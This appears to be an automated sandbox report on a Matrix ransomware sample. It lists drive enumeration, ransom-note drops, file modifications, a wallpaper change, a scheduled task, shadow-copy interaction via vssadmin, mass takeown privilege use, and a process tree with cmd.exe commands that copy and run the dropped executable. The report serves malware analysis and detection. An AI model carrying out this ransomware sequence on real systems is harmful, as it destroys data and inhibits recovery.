File opened (read-only)	\??\Q:	TaBI95AQ64.exe
File opened (read-only)	\??\V:	TaBI95AQ64.exe
File opened (read-only)	\??\E:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\Z:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\W:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\U:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\A:	TaBI95AQ64.exe
File opened (read-only)	\??\F:	TaBI95AQ64.exe
File opened (read-only)	\??\M:	TaBI95AQ64.exe
File opened (read-only)	\??\T:	TaBI95AQ64.exe
File opened (read-only)	\??\U:	TaBI95AQ64.exe
File opened (read-only)	\??\Y:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\T:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\G:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\W:	TaBI95AQ64.exe
File opened (read-only)	\??\N:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\M:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\G:	TaBI95AQ64.exe
File opened (read-only)	\??\O:	TaBI95AQ64.exe
File opened (read-only)	\??\S:	TaBI95AQ64.exe
File opened (read-only)	\??\X:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\S:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\P:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\N:	TaBI95AQ64.exe
File opened (read-only)	\??\X:	TaBI95AQ64.exe
File opened (read-only)	\??\Z:	TaBI95AQ64.exe
File opened (read-only)	\??\Q:	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened (read-only)	\??\I:	TaBI95AQ64.exe
File opened (read-only)	\??\L:	TaBI95AQ64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\5w893pya.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\CompatExceptions	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_replace_signer_18.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\az_get.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\jjs.exe	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\acrobat_pdf.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adobe_logo.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_da_135x40.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\external_extensions.json	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line_2x.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\plugin.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_cancel_18.svg	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\selector.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\ui-strings.js	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#README_JJLF#.rtf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
756	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
420	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe
2024	TaBI95AQ64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2024	TaBI95AQ64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2988	takeown.exe
Token: SeDebugPrivilege	2024	TaBI95AQ64.exe
Token: SeLoadDriverPrivilege	2024	TaBI95AQ64.exe
Token: SeTakeOwnershipPrivilege	1128	takeown.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeTakeOwnershipPrivilege	940	takeown.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeTakeOwnershipPrivilege	2004	takeown.exe
Token: SeTakeOwnershipPrivilege	544	takeown.exe
Token: SeTakeOwnershipPrivilege	1932	takeown.exe
Token: SeTakeOwnershipPrivilege	2964	takeown.exe
Token: SeTakeOwnershipPrivilege	1516	takeown.exe
Token: SeTakeOwnershipPrivilege	3308	takeown.exe
Token: SeTakeOwnershipPrivilege	3416	takeown.exe
Token: SeTakeOwnershipPrivilege	2792	takeown.exe
Token: SeTakeOwnershipPrivilege	2500	takeown.exe
Token: SeTakeOwnershipPrivilege	3776	takeown.exe
Token: SeTakeOwnershipPrivilege	940	takeown.exe
Token: SeTakeOwnershipPrivilege	1552	takeown.exe
Token: SeTakeOwnershipPrivilege	2004	takeown.exe
Token: SeTakeOwnershipPrivilege	2520	takeown.exe
Token: SeTakeOwnershipPrivilege	1228	takeown.exe
Token: SeTakeOwnershipPrivilege	3108	takeown.exe
Token: SeTakeOwnershipPrivilege	3136	takeown.exe
Token: SeTakeOwnershipPrivilege	876	takeown.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeTakeOwnershipPrivilege	940	takeown.exe
Token: SeTakeOwnershipPrivilege	3948	takeown.exe
Token: SeTakeOwnershipPrivilege	2448	takeown.exe
Token: SeTakeOwnershipPrivilege	3124	takeown.exe
Token: SeTakeOwnershipPrivilege	3144	takeown.exe
Token: SeTakeOwnershipPrivilege	2788	takeown.exe
Token: SeTakeOwnershipPrivilege	940	takeown.exe
Token: SeTakeOwnershipPrivilege	384	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	2876	takeown.exe
Token: SeTakeOwnershipPrivilege	3888	takeown.exe
Token: SeTakeOwnershipPrivilege	3996	takeown.exe
Token: SeTakeOwnershipPrivilege	3204	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	3784	takeown.exe
Token: SeTakeOwnershipPrivilege	316	takeown.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeTakeOwnershipPrivilege	2304	takeown.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeTakeOwnershipPrivilege	2304	takeown.exe
Token: SeTakeOwnershipPrivilege	2088	takeown.exe
Token: SeTakeOwnershipPrivilege	3556	takeown.exe
Token: SeTakeOwnershipPrivilege	2812	takeown.exe
Token: SeTakeOwnershipPrivilege	3912	takeown.exe
Token: SeTakeOwnershipPrivilege	524	takeown.exe
Token: SeTakeOwnershipPrivilege	1788	takeown.exe
Token: SeTakeOwnershipPrivilege	3204	takeown.exe
Token: SeTakeOwnershipPrivilege	1420	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	3240	takeown.exe
Token: SeTakeOwnershipPrivilege	556	takeown.exe
Token: SeTakeOwnershipPrivilege	4004	takeown.exe
Token: SeTakeOwnershipPrivilege	3416	takeown.exe
Token: SeBackupPrivilege	3996	vssvc.exe
Token: SeRestorePrivilege	3996	vssvc.exe
Token: SeAuditPrivilege	3996	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeSecurityPrivilege	2684	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3700 wrote to memory of 584	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	59
PID 3700 wrote to memory of 584	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	59
PID 3700 wrote to memory of 584	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	59
PID 3700 wrote to memory of 4020	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	61
PID 3700 wrote to memory of 4020	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	61
PID 3700 wrote to memory of 4020	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	61
PID 3700 wrote to memory of 1112	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	71
PID 3700 wrote to memory of 1112	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	71
PID 3700 wrote to memory of 1112	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	71
PID 3700 wrote to memory of 3440	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	72
PID 3700 wrote to memory of 3440	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	72
PID 3700 wrote to memory of 3440	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	72
PID 3700 wrote to memory of 1676	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	75
PID 3700 wrote to memory of 1676	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	75
PID 3700 wrote to memory of 1676	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	75
PID 3440 wrote to memory of 808	3440	cmd.exe	77
PID 3440 wrote to memory of 808	3440	cmd.exe	77
PID 3440 wrote to memory of 808	3440	cmd.exe	77
PID 1112 wrote to memory of 1932	1112	cmd.exe	78
PID 1112 wrote to memory of 1932	1112	cmd.exe	78
PID 1112 wrote to memory of 1932	1112	cmd.exe	78
PID 1112 wrote to memory of 1928	1112	cmd.exe	79
PID 1112 wrote to memory of 1928	1112	cmd.exe	79
PID 1112 wrote to memory of 1928	1112	cmd.exe	79
PID 1112 wrote to memory of 1208	1112	cmd.exe	80
PID 1112 wrote to memory of 1208	1112	cmd.exe	80
PID 1112 wrote to memory of 1208	1112	cmd.exe	80
PID 1676 wrote to memory of 1384	1676	cmd.exe	81
PID 1676 wrote to memory of 1384	1676	cmd.exe	81
PID 1676 wrote to memory of 1384	1676	cmd.exe	81
PID 1676 wrote to memory of 2988	1676	cmd.exe	82
PID 1676 wrote to memory of 2988	1676	cmd.exe	82
PID 1676 wrote to memory of 2988	1676	cmd.exe	82
PID 1676 wrote to memory of 2244	1676	cmd.exe	83
PID 1676 wrote to memory of 2244	1676	cmd.exe	83
PID 1676 wrote to memory of 2244	1676	cmd.exe	83
PID 2244 wrote to memory of 392	2244	cmd.exe	84
PID 2244 wrote to memory of 392	2244	cmd.exe	84
PID 2244 wrote to memory of 392	2244	cmd.exe	84
PID 392 wrote to memory of 2024	392	TaBI95AQ.exe	86
PID 392 wrote to memory of 2024	392	TaBI95AQ.exe	86
PID 3700 wrote to memory of 3396	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	87
PID 3700 wrote to memory of 3396	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	87
PID 3700 wrote to memory of 3396	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	87
PID 3396 wrote to memory of 3920	3396	cmd.exe	89
PID 3396 wrote to memory of 3920	3396	cmd.exe	89
PID 3396 wrote to memory of 3920	3396	cmd.exe	89
PID 3396 wrote to memory of 2856	3396	cmd.exe	90
PID 3396 wrote to memory of 2856	3396	cmd.exe	90
PID 3396 wrote to memory of 2856	3396	cmd.exe	90
PID 3396 wrote to memory of 2440	3396	cmd.exe	91
PID 3396 wrote to memory of 2440	3396	cmd.exe	91
PID 3396 wrote to memory of 2440	3396	cmd.exe	91
PID 2440 wrote to memory of 3304	2440	cmd.exe	92
PID 2440 wrote to memory of 3304	2440	cmd.exe	92
PID 2440 wrote to memory of 3304	2440	cmd.exe	92
PID 3396 wrote to memory of 1128	3396	cmd.exe	93
PID 3396 wrote to memory of 1128	3396	cmd.exe	93
PID 3396 wrote to memory of 1128	3396	cmd.exe	93
PID 3700 wrote to memory of 2596	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	94
PID 3700 wrote to memory of 2596	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	94
PID 3700 wrote to memory of 2596	3700	fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe	94
PID 2596 wrote to memory of 1096	2596	cmd.exe	96
PID 2596 wrote to memory of 1096	2596	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe
"C:\Users\Admin\AppData\Local\Temp\fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3700
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\fcbac00236a2e401a324a4d53e266d05b33fba5d7e8ac2cab0d6bcc93b7d944e.exe" "C:\Users\Admin\AppData\Local\Temp\NW6IMq61.exe"
  2⤵
  PID:584
- C:\Users\Admin\AppData\Local\Temp\NW6IMq61.exe
  "C:\Users\Admin\AppData\Local\Temp\NW6IMq61.exe" -n
  2⤵
  - Executes dropped EXE
  PID:4020
- C:\Windows\SysWOW64\cmd.exe
